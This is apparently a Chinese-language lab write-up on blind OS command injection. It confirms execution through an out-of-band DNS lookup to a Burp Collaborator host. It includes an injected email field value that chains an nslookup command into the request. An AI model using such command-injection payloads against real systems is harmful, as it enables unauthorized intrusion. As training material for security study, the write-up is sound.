# OS command injection Lab4 這題是盲注入搭配 Out-of-Band (OAST) 技術的利用。 無法從應用程式本身看到任何輸出、延遲或存取檔案,但你可以藉由觸發目標伺服器發送 DNS 請求到你控制的伺服器(例如 Burp Collaborator)來確認是否執行成功。 先進入網站然後攔截請求。   本提要發送 DNS,所以我們先去拿我們的子網域。  ``` 6597gkxmsqylh4qyxj7juuspdgj77yvn.oastify.com ``` 接著回來我們攔截的請求中,加上我們剛剛複製的子網域。  ``` email=x||nslookup+6597gkxmsqylh4qyxj7juuspdgj77yvn.oastify.com|| ``` :::info ### 為什麼用 nslookup? 因為 nslookup(或 ping)會觸發一個 DNS 查詢,是最常見、最穩定的 OAST 利用方式,即便伺服器不允許回傳任何資料,我們也能偵測這個「外部互動」。 ::: 現在去看看我們的 DNS。   ---
×
Sign in
Email
Password
Forgot password
or
By clicking below, you agree to our
terms of service
.
Sign in via Facebook
Sign in via Twitter
Sign in via GitHub
Sign in via Dropbox
Sign in with Wallet
Wallet (
)
Connect another wallet
New to HackMD?
Sign up